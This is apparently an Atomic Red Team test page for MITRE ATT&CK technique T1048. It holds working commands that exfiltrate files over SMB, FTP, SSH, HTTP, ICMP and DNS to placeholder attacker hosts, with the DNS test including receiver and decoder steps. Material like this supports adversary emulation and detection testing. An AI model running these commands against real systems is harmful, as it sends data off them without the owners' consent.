# T1048 - Exfiltration Over Alternative Protocol
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1048)
<blockquote>Data exfiltration is performed with a different protocol from the main command and control protocol or channel. The data is likely to be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different channels could include Internet Web services such as cloud storage.

Adversaries may leverage various operating system utilities to exfiltrate data over an alternative protocol. 

SMB command-line example:

* <code>net use \\\attacker_system\IPC$ /user:username password && xcopy /S /H /C /Y C:\Users\\* \\\attacker_system\share_folder\</code>

Anonymous FTP command-line example:(Citation: Palo Alto OilRig Oct 2016)

* <code>echo PUT C:\Path\to\file.txt | ftp -A attacker_system</code>
</blockquote>

## Atomic Tests

- [Atomic Test #1 - Exfiltration Over Alternative Protocol - SSH](#atomic-test-1---exfiltration-over-alternative-protocol---ssh)

- [Atomic Test #2 - Exfiltration Over Alternative Protocol - SSH](#atomic-test-2---exfiltration-over-alternative-protocol---ssh)

- [Atomic Test #3 - Exfiltration Over Alternative Protocol - HTTP](#atomic-test-3---exfiltration-over-alternative-protocol---http)

- [Atomic Test #4 - Exfiltration Over Alternative Protocol - ICMP](#atomic-test-4---exfiltration-over-alternative-protocol---icmp)

- [Atomic Test #5 - Exfiltration Over Alternative Protocol - DNS](#atomic-test-5---exfiltration-over-alternative-protocol---dns)


<br/>

## Atomic Test #1 - Exfiltration Over Alternative Protocol - SSH
Input a domain and test Exfiltration over SSH

Remote to Local

Upon successful execution, sh will spawn ssh contacting a remote domain (default: target.example.com) writing a tar.gz file.

**Supported Platforms:** macOS, Linux




#### Inputs:
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| domain | target SSH domain | url | target.example.com|


#### Attack Commands: Run with `sh`! 


```sh
ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
```






<br/>
<br/>

## Atomic Test #2 - Exfiltration Over Alternative Protocol - SSH
Input a domain and test Exfiltration over SSH

Local to Remote

Upon successful execution, tar will compress /Users/* directory and password protect the file modification of `Users.tar.gz.enc` as output.

**Supported Platforms:** macOS, Linux




#### Inputs:
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| domain | target SSH domain | url | target.example.com|
| user_name | username for domain | string | atomic|
| password | password for user | string | atomic|


#### Attack Commands: Run with `sh`! 


```sh
tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
```






<br/>
<br/>

## Atomic Test #3 - Exfiltration Over Alternative Protocol - HTTP
A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.

Upon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded.

**Supported Platforms:** macOS, Linux




#### Run it with these steps! 
1. Victim System Configuration:

    mkdir /tmp/victim-staging-area
    echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt

2. Using Python to establish a one-line HTTP server on victim system:

    cd /tmp/victim-staging-area
    python -m SimpleHTTPServer 1337

3. To retrieve the data from an adversary system:

    wget http://VICTIM_IP:1337/victim-file.txt







<br/>
<br/>

## Atomic Test #4 - Exfiltration Over Alternative Protocol - ICMP
Exfiltration of specified file over ICMP protocol.

Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout.

**Supported Platforms:** Windows




#### Inputs:
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| input_file | Path to file to be exfiltrated. | Path | C:&#92;Windows&#92;System32&#92;notepad.exe|
| ip_address | Destination IP address where the data should be sent. | String | 127.0.0.1|


#### Attack Commands: Run with `powershell`! 


```powershell
$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }
```






<br/>
<br/>

## Atomic Test #5 - Exfiltration Over Alternative Protocol - DNS
Exfiltration of specified file over DNS protocol.

**Supported Platforms:** Linux




#### Run it with these steps! 
1. On the adversary machine run the below command.

    tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches ".domain"" >> received_data.txt

2. On the victim machine run the below commands.

    xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done
    
3. Once the data is received, use the below command to recover the data.

    cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r







<br/>
